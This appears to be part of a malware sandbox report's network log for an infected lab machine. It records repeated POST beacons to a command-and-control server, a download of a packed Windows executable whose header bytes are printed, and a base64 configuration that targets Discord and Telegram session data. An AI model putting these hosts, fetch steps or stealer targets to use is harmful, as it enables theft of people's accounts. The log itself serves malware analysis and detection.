                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                33192.168.2.34982195.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:51.548367023 CET7117OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://pubplnqymd.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 368
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:51.650799990 CET7118INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                34192.168.2.34982295.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:51.870958090 CET7119OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://xwkfccuhh.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 126
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:51.972790003 CET7119INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                35192.168.2.34982395.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:52.724018097 CET7121OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://vndygv.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 292
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:52.821063995 CET7122INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:52 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                36192.168.2.34982495.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:53.195681095 CET7123OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wyjxomh.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 113
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:53.298787117 CET7123INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:53 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                37192.168.2.34982595.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:53.405021906 CET7124OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mdthdprqu.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 212
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:53.504515886 CET7125INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:53 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4a ed ac 8e 70 bc 57 da 4a d6 f7 22 81 20 ea c3 96 53 28 ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OU&1UPJ%9JpWJ" S(c0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                38192.168.2.34982695.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:53.624286890 CET7125OUTGET /files/4152_1638095425_4339.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
                                                                                                                                                                                Dec 1, 2021 10:04:53.709692955 CET7127INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:53 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 2740224
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Sun, 28 Nov 2021 10:30:25 GMT
                                                                                                                                                                                ETag: "29d000-5d1d6cff91027"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 f6 17 4c 43 97 79 1f 43 97 79 1f 43 97 79 1f 57 fc 7a 1e 48 97 79 1f 57 fc 7c 1e e5 97 79 1f 57 fc 7d 1e 51 97 79 1f 57 fc 7e 1e 42 97 79 1f 11 e2 7d 1e 52 97 79 1f 11 e2 7a 1e 56 97 79 1f 11 e2 7c 1e 69 97 79 1f 57 fc 78 1e 50 97 79 1f 43 97 78 1f d0 97 79 1f f6 e2 70 1e 44 97 79 1f f6 e2 86 1f 42 97 79 1f f6 e2 7b 1e 42 97 79 1f 52 69 63 68 43 97 79 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 77 37 a3 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 40 03 00 00 1c 01 00 00 00 00 00 10 52 46 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 6e 00 00 04 00 00 e5 b2 2a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fb 90 04 00 f8 00 00 00 00 a0 04 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 ed 3e 03 00 00 10 00 00 00 90 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 04 da 00 00 00 50 03 00 00 50 00 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 18 00 00 00 30 04 00 00 04 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 e0 01 00 00 00 50 04 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 1c 22 00 00 00 60 04 00 00 1e 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 90 04 00 00 02 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 04 00 00 02 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 68 65 6d 69 64 61 00 a0 41 00 00 b0 04 00 00 00 00 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 c4 27 00 00 50 46 00 00 c4 27 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 ba 2f 43 31 f0 0e da 6b c3 5c d3 df d8 e3 d4 d7 fc df d0 d2 2d ff 55 bb b4 b8 d8 4e c5 e8 dd 16 c7 8b 8c fd bf 73 ca f0 88 d3 1a b7 d2 75 95 ff 93 19
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LCyCyCyWzHyW|yW}QyW~By}RyzVy|iyWxPyCxypDyBy{ByRichCyPELw7a@RFP@ n*@ > ` PP@@ $0@ P@@ "`@B.idata@.rsrc@@.themidaA`.boot'PF'``w/C1k\-UNsu


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                39192.168.2.34982795.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:59.901526928 CET11319OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://qpiidyh.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 242
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:00.006170988 CET11320INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:59 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                4192.168.2.34975295.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:26.942143917 CET1101OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://llalic.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:27.042258024 CET1101INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:27 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                40192.168.2.34982895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:00.123142004 CET11321OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mgjqknucl.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:00.225522995 CET11322INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                41192.168.2.34982995.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:00.318556070 CET11322OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ehiesag.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:00.420095921 CET11323INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                42192.168.2.34983095.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:00.514219999 CET11324OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://eyepuy.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 293
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:00.617242098 CET11325INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                43192.168.2.34983195.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:00.536287069 CET11325OUTGET /tratata.php HTTP/1.1
                                                                                                                                                                                Host: file-file-host4.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Dec 1, 2021 10:05:00.631361961 CET11326INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.2
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                Data Raw: 63 34 0d 0a 4d 58 77 78 66 44 46 38 4d 58 78 45 61 58 4e 6a 62 33 4a 6b 66 44 42 38 4a 55 46 51 55 45 52 42 56 45 45 6c 58 47 52 70 63 32 4e 76 63 6d 52 63 54 47 39 6a 59 57 77 67 55 33 52 76 63 6d 46 6e 5a 56 78 38 4b 6e 77 78 66 44 42 38 4d 48 78 55 5a 57 78 6c 5a 33 4a 68 62 58 77 77 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 55 5a 57 78 6c 5a 33 4a 68 62 53 42 45 5a 58 4e 72 64 47 39 77 58 48 52 6b 59 58 52 68 58 48 77 71 52 44 67 33 4e 30 59 33 4f 44 4e 45 4e 55 51 7a 52 55 59 34 51 79 6f 73 4b 6d 31 68 63 43 6f 73 4b 6d 4e 76 62 6d 5a 70 5a 33 4d 71 66 44 46 38 4d 48 77 77 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: c4MXwxfDF8MXxEaXNjb3JkfDB8JUFQUERBVEElXGRpc2NvcmRcTG9jYWwgU3RvcmFnZVx8KnwxfDB8MHxUZWxlZ3JhbXwwfCVBUFBEQVRBJVxUZWxlZ3JhbSBEZXNrdG9wXHRkYXRhXHwqRDg3N0Y3ODNENUQzRUY4QyosKm1hcCosKmNvbmZpZ3MqfDF8MHwwfA==0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                44192.168.2.34983295.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:00.707607031 CET11327OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://lqyvwperx.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:00.807302952 CET11424INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
